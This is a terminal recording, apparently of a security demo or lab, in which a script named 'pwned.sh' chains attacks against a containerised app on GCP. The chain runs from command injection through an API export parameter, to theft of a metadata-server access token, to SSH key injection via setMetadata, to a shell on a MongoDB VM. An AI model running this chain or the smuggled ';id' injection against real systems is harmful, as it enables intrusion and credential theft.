{"version": 2, "width": 90, "height": 18, "timestamp": 1770959424, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.3, "o", "\u001b[1;32mroot@bucket-list-7d4f8b6c9-x2k4p:/app#\u001b[0m "]
[0.8, "o", "./pwned.sh X.Y.Z.A"]
[1.5, "o", "\r\n\r\n"]
[1.6, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[1.7, "o", "\u001b[1;36m|  Step 1: Command Injection (RCE)                         |\u001b[0m\r\n"]
[1.8, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[2.0, "o", "\u001b[33mExploiting /api/tasks/export?format=json;id ...\u001b[0m\r\n"]
[2.7, "o", "\u001b[1;31muid=0(root) gid=0(root) groups=0(root)\u001b[0m\r\n"]
[3.2, "o", "\u001b[1;32m[OK]\u001b[0m RCE as root inside the container\r\n"]
[4.5, "o", "\r\n"]
[4.6, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[4.7, "o", "\u001b[1;36m|  Step 2: Steal GCP Metadata Token                        |\u001b[0m\r\n"]
[4.8, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[5.0, "o", "\u001b[33mQuerying metadata server from inside the pod ...\u001b[0m\r\n"]
[5.8, "o", "Got token: \u001b[1;33mya29.c.c0AZ1aNiV-88P...1pwp4ygzsiFVnXgn2686\u001b[0m\r\n"]
[6.5, "o", "\u001b[1;32m[OK]\u001b[0m GCP access token stolen via metadata server\r\n"]
[8.0, "o", "\r\n"]
[8.1, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[8.2, "o", "\u001b[1;36m|  Step 3: Inject SSH Key onto MongoDB VM                  |\u001b[0m\r\n"]
[8.3, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[8.5, "o", "Generated throwaway keypair\r\n"]
[8.8, "o", "VM external IP: \u001b[1;33mREDACTED\u001b[0m\r\n"]
[9.0, "o", "\u001b[33mCalling setMetadata to inject SSH key ...\u001b[0m\r\n"]
[10.0, "o", "API response: \u001b[1;32mRUNNING\u001b[0m\r\n"]
[10.5, "o", "Waiting for metadata "]
[10.8, "o", "."]
[11.1, "o", "."]
[11.4, "o", "."]
[11.7, "o", ".\r\n"]
[12.2, "o", "\u001b[1;32m[OK]\u001b[0m SSH key injected via compute.admin\r\n"]
[13.5, "o", "\r\n"]
[13.6, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[13.7, "o", "\u001b[1;36m|  Step 4: SSH into MongoDB VM                             |\u001b[0m\r\n"]
[13.8, "o", "\u001b[1;36m+----------------------------------------------------------+\u001b[0m\r\n"]
[14.0, "o", "\u001b[33mConnecting to attacker@REDACTED ...\u001b[0m\r\n"]
[15.0, "o", "Welcome to \u001b[1mUbuntu 22.04.5 LTS\u001b[0m (GNU/Linux 6.8.0-1047-gcp x86_64)\r\n"]
[15.3, "o", "  IPv4 address for ens4: \u001b[1;33m10.0.1.6\u001b[0m\r\n"]
[15.5, "o", "  \u001b[1;33mNew release '24.04.4 LTS' available.\u001b[0m\r\n"]
[16.0, "o", "\r\n\u001b[1;32mattacker@mongo-vm\u001b[0m:\u001b[1;34m~\u001b[0m$ "]
[16.5, "o", "P"]
[16.6, "o", "W"]
[16.7, "o", "N"]
[16.8, "o", "E"]
[16.9, "o", "D"]
[17.5, "o", "\r\nPWNED: command not found\r\n"]
[19.5, "o", "\r\n"]
[19.6, "o", "\u001b[1;31m+----------------------------------------------------------+\u001b[0m\r\n"]
[19.7, "o", "\u001b[1;31m|                                                          |\u001b[0m\r\n"]
[19.8, "o", "\u001b[1;31m|   GAME OVER - Full access to MongoDB VM and data        |\u001b[0m\r\n"]
[19.9, "o", "\u001b[1;31m|   RCE -> GCP token -> SSH key inject -> VM access       |\u001b[0m\r\n"]
[20.0, "o", "\u001b[1;31m|                                                          |\u001b[0m\r\n"]
[20.1, "o", "\u001b[1;31m+----------------------------------------------------------+\u001b[0m\r\n"]
[21.5, "o", "\r\n"]
